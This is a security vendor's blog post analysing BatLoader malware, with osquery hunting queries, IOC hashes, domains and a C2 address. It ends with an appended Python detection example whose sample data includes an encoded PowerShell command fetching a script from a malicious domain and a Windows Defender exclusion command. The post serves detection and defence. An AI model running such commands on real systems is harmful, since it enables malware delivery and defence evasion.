
Tracking BatLoader Malware Using Uptycs

Blog Author
Uptycs Team

Contributed by: Nandakumar KJ & Josh Lemon

BatLoader is a stealthy initial-access malware that is distributed through malvertising. Because of how deeply it embeds itself in a compromised system, it is difficult to remove completely. It also abuses legitimate tools for privilege elevation, payload decryption, and running malicious scripts in order to deploy second-stage infostealer malware (e.g., Arkei/Vidar, Ursnif, Cobalt Strike Beacon, Rhadamanthys).

This blog post includes a technical analysis of the BatLoader malware along with a description of how Uptycs MDR analysts identify and remediate it. In many cases, we have provided the SQL queries used in our investigation.

Technical Analysis

BatLoader typically enters through malicious web pages that masquerade as trustworthy programs or software. Malvertising campaigns and fake forum comments that link to BatLoader distribution sites direct victims to these pages.

Uptycs recently observed BatLoader initiating execution through an encoded PowerShell script. The script used the WebClient.DownloadString method to retrieve a string from a remote URL onto the local system.

Encoded PowerShell script using the WebClient.DownloadString method to retrieve the string from the URL to the local system

Upon execution of the initial malicious PowerShell script, BatLoader runs additional PowerShell commands that add an exclusion to Windows Defender as a defense evasion technique.

Additional PowerShell commands adding a Windows Defender exclusion

The PowerShell script also downloads and executes additional executables: zkoko.exe.gpg, Nsudo.exe, and gpg4win-2.2.5.exe. These are placed in the %USERPROFILE%\AppData\Roaming directory.

Domains accessed by PowerShell to collect second stage malware – osquery, DNS to process mapping

select * from DNS_lookup_events Where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND pid =1548 AND upt_time between timestamp '2023-03-01 05:50:00' AND timestamp '2023-03-01 06:10:00'

Downloaded executables – Uptycs Real-Time Actions

The payload is decrypted using the gpg4win.exe binary, a common Windows email and file encryption package.

gpg2.exe process decrypting the payload using the gpg4win.exe binary

Nsudo.exe is a management tool for launching programs with elevated privileges. In this attack, it is used to impair defenses by hiding the window while the payload is being executed.

The infostealer malware dropped by BatLoader attempts to collect sensitive data from the victim's system via the Windows API. This includes information about system disk drives, disk types, BIOS, processor, computer name, and serial number.

Additionally, the malware crawls the directories of the browsers installed on the victim's machine, attempting to collect the data stores for browsing history, bookmarks, cookies, autofill entries, and saved login passwords. Once collected, the sensitive data is relayed to the threat actor's server. In the malware sample we observed, the command-and-control (C2) server (79.137.204.54) is associated with the Rhadamanthys malware family.

C2 server connection – contextual details in the Uptycs detection UI

Uptycs MDR

The Uptycs managed detection and response engine includes built-in behavioral rules, YARA signatures, and threat intelligence data. Our skilled security analyst team constantly monitors detections and hunts for widespread and active threats in the environment.

From this BatLoader malware sample, we observed that the victim system was also infected with Rhadamanthys. It was discovered through YARA signature matches in memory, and the detection also included behavioral rules triggered by known malware actions as well as Uptycs threat intelligence matches.

Additionally, Uptycs EDR contextual detection provides important details about identified malware, mapped behavior in the ATT&CK Matrix (left pane, below), and a detection graph that shows process ancestry. Users can navigate to the toolkit data section in the detection, then click on the name to learn more.

Rhadamanthys detection

Built atop osquery, the Uptycs agent collects vast, high-quality telemetry from endpoints, cloud resources, and Kubernetes systems. The telemetry is exposed through osquery tables (e.g., process_events, powershell_events, scheduled_tasks). The open-source osquery schema is published by the osquery project; Uptycs has added a significant number of additional tables to it.

Using the Uptycs Investigate feature, we were able to investigate the malicious activity further by running SQL queries against the osquery tables containing data collected from the endpoint where we executed the malware.

Searching process_events to find the activity of the suspicious user

select * from process_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND login_name = 'Administrator' AND upt_time between timestamp '2023-03-01 05:45:00' AND timestamp '2023-03-01 06:10:00'

Searching socket_events to find executables that connect to the C2 server

select * from socket_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' AND upt_day =20230301 AND remote_address ='79.137.204.54'

Searching api_events to find the API calls used by zkoko.exe

select * from api_events where upt_asset_id ='ec2356f0-bbfa-8f79-ed7b-f6d972698e85' and cmdline like '%powershell.exe  -command C:\Users\Administrator\AppData\Roaming\zkoko.exe%'
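The following worked example is added here and is not Uptycs code or part of the original post. It loads constructed process_events rows (shaped like the rows the queries above return) into an in-memory SQLite table, expands any PowerShell -EncodedCommand payload so the DownloadString and Windows Defender exclusion behaviours described earlier are visible to LIKE patterns, and runs one hunt over the same asset, user and time window as the process_events query above. The sample command lines, the job-lionserver.site path, the `<decoded>` marker and the use of SQLite (rather than the Uptycs query engine) are assumptions made for the example.

```python
import base64
import re
import sqlite3

# Asset id copied from the post's queries; the rows are constructed test data, not real telemetry.
ASSET = "ec2356f0-bbfa-8f79-ed7b-f6d972698e85"
ROAMING = "C:\\Users\\Administrator\\AppData\\Roaming"

def encode_ps(script):  # PowerShell -EncodedCommand takes base64 over UTF-16LE text
    return base64.b64encode(script.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # (upt_asset_id, login_name, upt_time, cmdline), modelled on the post
    (ASSET, "Administrator", "2023-03-01 05:51:10", "powershell.exe -enc " + encode_ps(
        "(New-Object Net.WebClient).DownloadString('http://job-lionserver.site/x')")),
    (ASSET, "Administrator", "2023-03-01 05:52:05",
     f"powershell.exe -command Add-MpPreference -ExclusionPath {ROAMING}"),
    (ASSET, "Administrator", "2023-03-01 05:53:40", f"gpg2.exe --decrypt {ROAMING}\\zkoko.exe.gpg"),
    (ASSET, "Administrator", "2023-03-01 05:54:00",
     f"{ROAMING}\\Nsudo.exe -ShowWindowMode:Hide powershell.exe -command {ROAMING}\\zkoko.exe"),
    (ASSET, "svc_backup", "2023-03-01 05:55:00", "svchost.exe -k netsvcs"),  # benign noise
]

def decode_encoded_command(cmdline):
    """Append the decoded -enc/-EncodedCommand payload so LIKE patterns can inspect it."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return cmdline
    try:
        return cmdline + " <decoded> " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline

# Same asset, user and time window as the post's process_events query; CASE labels each behaviour.
HUNT_SQL = """SELECT upt_time, CASE
    WHEN lower(cmdline) LIKE '%downloadstring%' THEN 'remote script fetch'
    WHEN lower(cmdline) LIKE '%add-mppreference%exclusion%' THEN 'defender exclusion'
    WHEN lower(cmdline) LIKE '%gpg%' AND lower(cmdline) LIKE '%appdata\\roaming%' THEN 'gpg payload decrypt'
    WHEN lower(cmdline) LIKE '%nsudo.exe%' THEN 'nsudo elevated launch'
  END AS finding
FROM process_events
WHERE upt_asset_id = ? AND login_name = 'Administrator'
  AND upt_time BETWEEN '2023-03-01 05:45:00' AND '2023-03-01 06:10:00'
ORDER BY upt_time"""

def hunt(events=SAMPLE_EVENTS, asset=ASSET):
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE process_events(upt_asset_id, login_name, upt_time, cmdline)")
    con.executemany("INSERT INTO process_events VALUES (?, ?, ?, ?)",
                    [(a, u, t, decode_encoded_command(c)) for a, u, t, c in events])
    return [(t, f) for t, f in con.execute(HUNT_SQL, (asset,)) if f]
```

Rows outside the asset, user or time window, and rows that match none of the CASE branches, are dropped, so the result is the ordered chain of BatLoader behaviours on the investigated host.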

The Uptycs Managed Detection and Response (MDR) team responds to threats using the Uptycs Protect remediation and blocking feature. Based on the detection graph for the detected malicious activity (below), it lets you kill, delete, pause, or scan the binary with YARA rules, or collect the file for additional analysis. Additionally, we have the ability to manage users, run scripts on the host machine, quarantine the machine, or investigate the malicious process further.

Uptycs Protect – detection graph

Monitoring all potential threats in an environment is essential, especially those that abuse legitimate tools to obscure their presence, as the BatLoader malware does. The Uptycs MDR team makes this possible by detecting and taking action in response to threats in our customers' environments.

Indicators of Compromise (IOCs)

File name            MD5 hash
zkoko.exe.gpg        199b1499566ddc2e86e3ea3e4db7f3ff
Nsudo.exe            5cae01aea8ed390ce9bec17b6c1237e4
gpg4win-2.2.5.exe    67a4f35cae2896e3922f6f4ab5966e2b
zkoko.exe            3f82d9d43d56e56d523b2457bf6fa839

Domain/URL/IP address
job-lionserver.site
job-lionserver.ru
81.177.165.87
185.199.111.133
79.137.204.54

Malware Samples

https://www.virustotal.com/gui/file/19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

https://www.virustotal.com/gui/file/43894c287c3ebccd30cd761dd4826518073773180ae0ab28355d604b44071441